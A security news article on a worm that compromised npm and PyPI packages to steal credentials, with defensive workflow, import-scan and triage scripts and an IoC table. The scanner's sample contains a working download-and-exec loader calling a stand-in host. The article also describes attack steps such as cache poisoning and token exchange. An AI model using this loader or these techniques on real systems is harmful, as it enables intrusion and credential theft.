Hackers News

Threats

Hackers Compromise 170 npm Packages to Steal GitHub

Jennifer Sherman
May 14, 2026

Software developers globally are facing a significant threat following a sprawling supply chain attack. Attackers compromised over 170 npm packages and two PyPI packages in a coordinated campaign designed for credential theft.

The compromised packages are collectively downloaded more than 200 million times per week, so the potential blast radius is enormous.

The threat group behind the campaign, tracked as TeamPCP, injected malicious loaders and obfuscated JavaScript payloads into widely used developer packages.

These payloads were built to run silently inside developer machines and CI/CD pipelines, harvest sensitive credentials, and use those credentials to spread even further. The scale of exposure caught many development teams off guard.

Researchers at JFrog uncovered the full scope of this campaign, naming it “Shai-Hulud: Here We Go Again” after recognizing hallmarks from previous attacks by the same group.

Their analysis revealed that this was not a simple one-time intrusion but a self-replicating operation designed to keep growing with every successful new infection.

Hackers Compromise 170 npm Packages

The attack began inside a trusted GitHub release environment. The attackers exploited a workflow pattern in which code from a fork (the contents of a pull request) was checked out and executed under the repository's own privileged context, with access to its secrets, gaining a foothold without raising immediate red flags.

From there, they poisoned a build cache entry, which a later release workflow restored during what looked like routine build activity. A cache entry is identified only by its key, so once a poisoned entry existed under the key the release job uses, the release job accepted its contents as if it had produced them itself.
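A linter for the two workflow patterns described above, written for this article as an added example (it is not TeamPCP's code or JFrog's tooling). It assumes the common form of the fork-code pattern, a `pull_request_target` (or similar privileged) trigger combined with a checkout of the pull request head, and takes each workflow as the dict that PyYAML's `yaml.safe_load()` returns for the workflow file. The sample workflows are constructed, not taken from any real repository.

```python
"""Flag fork-controlled code run under a privileged trigger, and a cache
restored inside a job that can publish. Added example, not the campaign's
code or JFrog's tooling. Workflows are the dicts yaml.safe_load() returns
(assumption: PyYAML, which reads a bare `on:` key as the boolean True)."""

# Triggers that carry the base repository's secrets even for fork-originated events.
PRIVILEGED_TRIGGERS = {"pull_request_target", "workflow_run", "issue_comment"}
# Expressions that resolve to the pull request's head, a revision the fork controls.
FORK_REF_MARKERS = ("github.event.pull_request.head", "github.head_ref")
CACHE_ACTIONS = {"actions/cache", "actions/cache/restore"}


def _triggers(workflow):
    on = workflow.get("on", workflow.get(True))
    if isinstance(on, str):
        return {on}
    if isinstance(on, list):
        return set(on)
    return set(on.keys()) if isinstance(on, dict) else set()


def _action(step):
    return str(step.get("uses", "")).split("@")[0]


def _checks_out_fork_head(step):
    ref = str((step.get("with") or {}).get("ref", ""))
    return _action(step) == "actions/checkout" and any(m in ref for m in FORK_REF_MARKERS)


def _can_publish(job, workflow):
    perms = job.get("permissions") or workflow.get("permissions") or {}
    if isinstance(perms, dict) and perms.get("id-token") == "write":
        return True  # can mint the OIDC token that npm trusted publishing accepts
    return any("npm publish" in str(s.get("run", "")) for s in job.get("steps") or [])


def lint_workflow(workflow):
    """Return (job_name, finding) pairs; an empty list means no pattern matched."""
    findings = []
    privileged = _triggers(workflow) & PRIVILEGED_TRIGGERS
    for job_name, job in (workflow.get("jobs") or {}).items():
        steps = job.get("steps") or []
        if privileged and any(_checks_out_fork_head(s) for s in steps):
            findings.append((job_name, "fork-head-checkout-under-privileged-trigger"))
        if _can_publish(job, workflow) and any(_action(s) in CACHE_ACTIONS for s in steps):
            findings.append((job_name, "cache-restore-in-publishing-job"))
    return findings


# Constructed sample workflows, not taken from any real repository.
VULNERABLE_PR = {
    "on": {"pull_request_target": {"types": ["opened", "synchronize"]}},
    "jobs": {"test": {"runs-on": "ubuntu-latest", "steps": [
        # Checks out the fork's commit, then runs its package.json scripts with repo secrets.
        {"uses": "actions/checkout@v4",
         "with": {"ref": "${{ github.event.pull_request.head.sha }}"}},
        {"uses": "actions/cache@v4",
         "with": {"path": "node_modules", "key": "deps-${{ hashFiles('package-lock.json') }}"}},
        {"run": "npm ci && npm test"},
    ]}},
}
HARDENED_PR = {
    # pull_request runs fork code without secrets; checkout defaults to the merge commit.
    "on": "pull_request",
    "jobs": {"test": {"runs-on": "ubuntu-latest", "steps": [
        {"uses": "actions/checkout@v4"},
        {"run": "npm ci && npm test"},
    ]}},
}
RELEASE_WITH_CACHE = {
    "on": {"push": {"tags": ["v*"]}},
    "permissions": {"id-token": "write", "contents": "read"},
    "jobs": {"publish": {"runs-on": "ubuntu-latest", "steps": [
        {"uses": "actions/checkout@v4"},
        # Restores whatever sits under the same key, including an entry planted by the PR job.
        {"uses": "actions/cache@v4",
         "with": {"path": "node_modules", "key": "deps-${{ hashFiles('package-lock.json') }}"}},
        {"run": "npm ci && npm publish --provenance"},
    ]}},
}
HARDENED_RELEASE = {
    "on": {"push": {"tags": ["v*"]}},
    "permissions": {"id-token": "write", "contents": "read"},
    "jobs": {"publish": {"runs-on": "ubuntu-latest", "steps": [
        {"uses": "actions/checkout@v4"},
        {"run": "npm ci && npm publish --provenance"},  # rebuilt from the lockfile, no cache
    ]}},
}

if __name__ == "__main__":
    for label, wf in [("vulnerable PR", VULNERABLE_PR), ("hardened PR", HARDENED_PR),
                      ("release with cache", RELEASE_WITH_CACHE), ("hardened release", HARDENED_RELEASE)]:
        print(label, lint_workflow(wf))
```

The hardened release job pays for a fresh `npm ci` on every tag; that cost is the point, since a publishing job should not accept build inputs that any earlier run could have written.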

Once inside, the malware extracted GitHub Actions identity tokens from runner memory and exchanged them for npm publishing credentials.

It then injected malicious code into additional packages, bumped their version numbers, and republished them. Each compromised package became a launchpad for the next wave of infections.

What makes this campaign especially alarming is its worm-like behavior. Instead of stealing secrets from one machine and stopping, the malware keeps moving.

After collecting npm tokens or trusted-publishing credentials, the payload scans for every package the victim account can publish, rewrites those packages with malicious code, and pushes new infected versions to the public registry.

The malware can also request an OIDC token for the npm registry and exchange it for a publishing token, all while hiding behind the same trusted workflow identity that real developers use.

This means a malicious version can carry the same publisher identity and provenance as a legitimate release: the registry sees a publish from the trusted workflow, not from an attacker.

The campaign also expanded into Python through two compromised PyPI packages. The PyPI variant uses an import-time trigger, so just importing the package in any Python script can activate the loader.

That loader then silently downloads a remote payload from attacker servers, which has since evolved into a full credential stealer targeting cloud providers, Kubernetes, Vault, password managers, and developer tools.
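A scanner for the import-time trigger style described above, added here as an example (it is not the campaign's loader and not JFrog's tooling). It walks a module's AST and reports calls that execute on `import`, meaning anything at module scope, including inside `try`/`if` blocks and class bodies, but not inside function bodies. The two sample `__init__.py` sources are constructed for the demonstration; the callee list is an assumption and deliberately noisy, to be tuned per environment.

```python
"""Report calls that run when a package's __init__.py is imported. Added
example, not the PyPI payload or JFrog's tooling; sample sources are constructed."""
import ast
import os

# Callees worth a look at module scope: fetch, decode, dynamic execution, shelling out.
# An assumption for this demo; extend or trim for your own packages.
SUSPICIOUS_CALLS = {
    "urlopen", "urlretrieve", "b64decode", "exec", "eval", "compile",
    "system", "Popen", "check_output", "__import__",
}


def _call_name(node):
    func = node.func
    if isinstance(func, ast.Name):
        return func.id
    if isinstance(func, ast.Attribute):
        return func.attr
    return None


class _ImportTimeCalls(ast.NodeVisitor):
    """Collect calls that execute at import: module scope, including inside
    if/try/with/for blocks and class bodies, but not inside def or lambda
    bodies, which only run when called."""

    def __init__(self):
        self.hits = []

    def visit_FunctionDef(self, node):
        return None  # do not descend: the body runs only on call

    visit_AsyncFunctionDef = visit_FunctionDef
    visit_Lambda = visit_FunctionDef

    def visit_Call(self, node):
        name = _call_name(node)
        if name in SUSPICIOUS_CALLS:
            self.hits.append((node.lineno, name))
        self.generic_visit(node)  # nested calls such as exec(compile(...))


def scan_source(source):
    """Return [(line, callee), ...] for import-time calls in one module."""
    visitor = _ImportTimeCalls()
    visitor.visit(ast.parse(source))
    return visitor.hits


def scan_tree(root):
    """Scan every __init__.py under root, e.g. a site-packages directory."""
    report = {}
    for dirpath, _dirs, files in os.walk(root):
        if "__init__.py" in files:
            path = os.path.join(dirpath, "__init__.py")
            with open(path, encoding="utf-8", errors="replace") as fh:
                try:
                    hits = scan_source(fh.read())
                except SyntaxError:
                    hits = [(0, "syntax-error")]
            if hits:
                report[path] = hits
    return report


# Constructed sample: a loader that fires on `import pkg`; not the real payload.
LOADER_INIT = '''\
import base64, urllib.request
try:
    _blob = urllib.request.urlopen("https://203.0.113.10/stage2.bin").read()
    exec(compile(base64.b64decode(_blob), "<stage2>", "exec"))
except Exception:
    pass
'''

# Constructed benign package: the same callees exist, but only inside a function.
BENIGN_INIT = '''\
import urllib.request
__version__ = "1.0"

def fetch(url):
    return urllib.request.urlopen(url).read()
'''

if __name__ == "__main__":
    print("loader:", scan_source(LOADER_INIT))
    print("benign:", scan_source(BENIGN_INIT))
```

Run `scan_tree` against a virtualenv's `site-packages` after installing a suspect version; the output is a triage list, not a verdict, since legitimate packages also do work at import.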

Credential Theft and the Dead-Man Switch

The npm payload targets a wide range of secrets, including GitHub tokens, npm credentials, AWS access keys from environment variables and cloud metadata services, Kubernetes service account tokens, HashiCorp Vault tokens, SSH keys, Docker credentials, and generic API keys.

In cloud environments, it queries the EC2 metadata service to retrieve IAM role credentials directly. The malware uses GitHub itself as an exfiltration channel.

It creates a public repository under a stolen token, commits encrypted credential bundles there, and marks the repository with the campaign name as a tracker.

Commits containing stolen GitHub tokens carry a threatening message warning defenders against revoking access. That threat is backed by a real dead-man switch.

The malware installs a background monitor that polls GitHub every 60 seconds and, if the stolen token is revoked, immediately triggers a destructive wipe command on the affected machine.

Defenders must fully remove all persistence before rotating any credentials, or they risk triggering the wiper themselves.

JFrog recommends isolating all affected machines and CI/CD runners before revoking any tokens. Persistence files and background services must be removed first.

After cleanup, teams should rotate GitHub tokens, npm tokens, AWS credentials, Kubernetes service accounts, Vault tokens, and SSH keys.

Developers should also review repositories for commits authored as “[email protected]” and look for unexpected Dependabot-like branches that do not match normal automation patterns.

Indicators of Compromise (IoCs):

| Type | Indicator | Description |
|---|---|---|
| IP address | 83.142.209.194 | Primary attacker C2 server and PyPI payload host |
| URL | hxxps[:]//83.142.209.194/transformers.pyz | PyPI remote payload download URL |
| URL | hxxps[:]//83.142.209.194/v1/models | PyPI early-quarantine / second-stage retrieval endpoint |
| URL | hxxps[:]//83.142.209.194/v1/weights | PyPI primary credential exfiltration endpoint |
| URL | hxxps[:]//83.142.209.194/audio.mp3 | PyPI destructive second-stage media download |
| Domain | seed1[.]getsession[.]org | Session/Oxen seed node for encrypted credential upload |
| Domain | seed2[.]getsession[.]org | Session/Oxen seed node for encrypted credential upload |
| Domain | seed3[.]getsession[.]org | Session/Oxen seed node for encrypted credential upload |
| Domain | filev2[.]getsession[.]org | Session/Oxen file upload service |
| Domain | git-tanstack[.]com | Campaign infrastructure |
| Domain | api[.]masscan[.]cloud | Campaign infrastructure |
| File | transformers.pyz | Malicious PyPI downloaded payload |
| File path | /tmp/transformers.pyz | PyPI payload drop path on Linux |
| File | setup.mjs | npm campaign loader file |
| File | router_init.js (also tanstack_runner.js) | npm malicious JavaScript payload |
| File path | ~/.local/bin/gh-token-monitor.sh | Linux dead-man switch script |
| File path | ~/.config/systemd/user/gh-token-monitor.service | Linux dead-man switch systemd service |
| File path | ~/Library/LaunchAgents/com.user.gh-token-monitor.plist | macOS dead-man switch LaunchAgent |
| File path | ~/.local/bin/pgmonitor.py | PyPI second-stage persistence payload (Linux user) |
| File path | /usr/bin/pgmonitor.py | PyPI second-stage persistence payload (root) |
| Service name | pgsql-monitor.service | PyPI second-stage systemd persistence, masquerades as a PostgreSQL monitor |
| Email / commit author | [email protected] | GitHub commit author marker used for dead-drop exfiltration |
| Keyword | FIRESCALE | PyPI fallback C2 discovery keyword searched in GitHub commits |
| Repository description | Shai-Hulud: Here We Go Again | GitHub dead-drop repository description (npm variant) |
| Repository description | PUSH UR T3MPRR | GitHub exfiltration repository description (PyPI variant) |
| Hash (SHA-1) | 29c729852fce5a53e30a1541d9fec79c915b2e13 | npm payload hash |
| Hash (SHA-1) | f1eda94a5978cf0aae0d88d92ec78d556d696e20 | npm payload hash |
| Hash (SHA-1) | 8927cc503d48e4b5eb56b31abc2870c2ed2e98d6 | npm payload hash |
| Hash (SHA-1) | be27fc96ab4fcadaec49c03278063dd269ea5eef | npm payload hash |
| Hash (published as SHA-1; 32 hex chars, which is MD5 length) | 82d24f2124a8e15d7b90f2fa8601266c | npm payload hash; confirm the algorithm before loading it into a matching rule |
| Hash (SHA-256) | d4a2086ea18f5e39cd867b8b06918a524eabb21d45ea98aad07357b98173458a | npm payload hash |
| Hash (SHA-256) | 2a314ea8be337e1ca9ec833ed13ed854d9fd38bce0a519cf288f3bec8d9e6f30 | PyPI __init__.py payload hash |
| Hash (SHA-256) | 5245eb032e336b85cff0dbb3450d591826bf2ef214fd30d7eba1a763664e151b | Updated PyPI transformers.pyz payload hash |

Note: IP addresses and domains are intentionally defanged (e.g., [.]) to prevent accidental resolution or hyperlinking. Re-fang only within controlled threat intelligence platforms such as MISP, VirusTotal, or your SIEM.
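A host triage script that turns the IoC table and the cleanup ordering above (isolate, remove persistence, then rotate) into something runnable, added here as an example; it is not JFrog's or the campaign's code. It only reads files and never deletes anything. The file paths, loader names and hashes are the ones listed in the table (the 32-character hash is omitted because its algorithm is unclear); the `systemctl` and `launchctl` commands it suggests are my own, derived from the service and LaunchAgent names in the table, and the fixture it builds in a temporary directory is constructed for the demonstration.

```python
"""Host triage for the IoC table: find persistence first, only then report
that token rotation is safe. Added example, not JFrog's or the campaign's
code; it reads files and never deletes anything."""
import hashlib
import os
import tempfile

# User-scoped persistence paths from the IoC table, relative to a home directory.
PERSISTENCE_IN_HOME = (
    ".local/bin/gh-token-monitor.sh",
    ".config/systemd/user/gh-token-monitor.service",
    "Library/LaunchAgents/com.user.gh-token-monitor.plist",
    ".local/bin/pgmonitor.py",
)
# Absolute paths from the IoC table (root-level PyPI persistence and the drop path).
PERSISTENCE_ABSOLUTE = ("/usr/bin/pgmonitor.py", "/tmp/transformers.pyz")
LOADER_NAMES = {"setup.mjs", "router_init.js", "tanstack_runner.js"}
PAYLOAD_HASHES = {  # SHA-1 and SHA-256 values from the table; the 32-char one is omitted
    "29c729852fce5a53e30a1541d9fec79c915b2e13",
    "f1eda94a5978cf0aae0d88d92ec78d556d696e20",
    "8927cc503d48e4b5eb56b31abc2870c2ed2e98d6",
    "be27fc96ab4fcadaec49c03278063dd269ea5eef",
    "d4a2086ea18f5e39cd867b8b06918a524eabb21d45ea98aad07357b98173458a",
    "2a314ea8be337e1ca9ec833ed13ed854d9fd38bce0a519cf288f3bec8d9e6f30",
    "5245eb032e336b85cff0dbb3450d591826bf2ef214fd30d7eba1a763664e151b",
}


def _digests(path):
    sha1, sha256 = hashlib.sha1(), hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(1 << 16), b""):
            sha1.update(chunk)
            sha256.update(chunk)
    return {sha1.hexdigest(), sha256.hexdigest()}


def find_persistence(home, absolute=PERSISTENCE_ABSOLUTE):
    """Existing dead-man-switch and second-stage persistence artifacts."""
    candidates = [os.path.join(home, rel) for rel in PERSISTENCE_IN_HOME] + list(absolute)
    return [p for p in candidates if os.path.lexists(p)]


def find_loaders(project_root):
    """Files under node_modules carrying a campaign loader name; 'hash_match'
    is True only when the content matches a published payload hash."""
    found = []
    for dirpath, _dirs, files in os.walk(os.path.join(project_root, "node_modules")):
        for name in files:
            if name in LOADER_NAMES:
                path = os.path.join(dirpath, name)
                found.append({"path": path, "hash_match": bool(_digests(path) & PAYLOAD_HASHES)})
    return found


def rotation_allowed(home, absolute=PERSISTENCE_ABSOLUTE):
    """The article's ordering rule: revoking a token while the monitor still
    runs triggers the wiper, so rotation is allowed only once nothing persists."""
    return not find_persistence(home, absolute)


def cleanup_commands(found):
    """Suggested commands (assumption, not from the article) to stop the
    monitors before their files are deleted. Returned as strings, never run."""
    cmds = []
    for p in found:
        if p.endswith("gh-token-monitor.service"):
            cmds.append("systemctl --user disable --now gh-token-monitor.service")
        elif p.endswith(".plist"):
            cmds.append(f"launchctl bootout gui/$(id -u) {p}")
        elif p.endswith("pgmonitor.py"):
            cmds.append("sudo systemctl disable --now pgsql-monitor.service")
    return cmds


def build_demo_tree(infected=True):
    """Constructed fixture: a fake home and project inside a temp directory."""
    root = tempfile.mkdtemp(prefix="triage-demo-")
    home, project = os.path.join(root, "home"), os.path.join(root, "proj")
    os.makedirs(os.path.join(project, "node_modules", "some-dep"))
    os.makedirs(home)
    if infected:
        for rel in (".local/bin/gh-token-monitor.sh", ".config/systemd/user/gh-token-monitor.service"):
            os.makedirs(os.path.dirname(os.path.join(home, rel)), exist_ok=True)
            with open(os.path.join(home, rel), "w") as fh:
                fh.write("# placeholder, constructed for the demo\n")
        with open(os.path.join(project, "node_modules", "some-dep", "setup.mjs"), "w") as fh:
            fh.write("// placeholder loader name, constructed for the demo\n")
    return home, project


if __name__ == "__main__":
    home, project = build_demo_tree()
    found = find_persistence(home, absolute=())
    print("persistence:", found)
    print("stop first:", cleanup_commands(found))
    print("loaders:", find_loaders(project))
    print("rotation allowed:", rotation_allowed(home, absolute=()))
```

On a real host run it with the network already cut, treat a name-only loader match as a prompt to pull the file for analysis rather than proof, and re-run `rotation_allowed` after cleanup before touching any token.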

About the author

Jennifer Sherman is a cybersecurity news reporter covering data breaches, ransomware campaigns, and dark web markets. With a background in incident response, she provides insight into how organizations respond to cyber attacks and the evolving tactics of threat actors.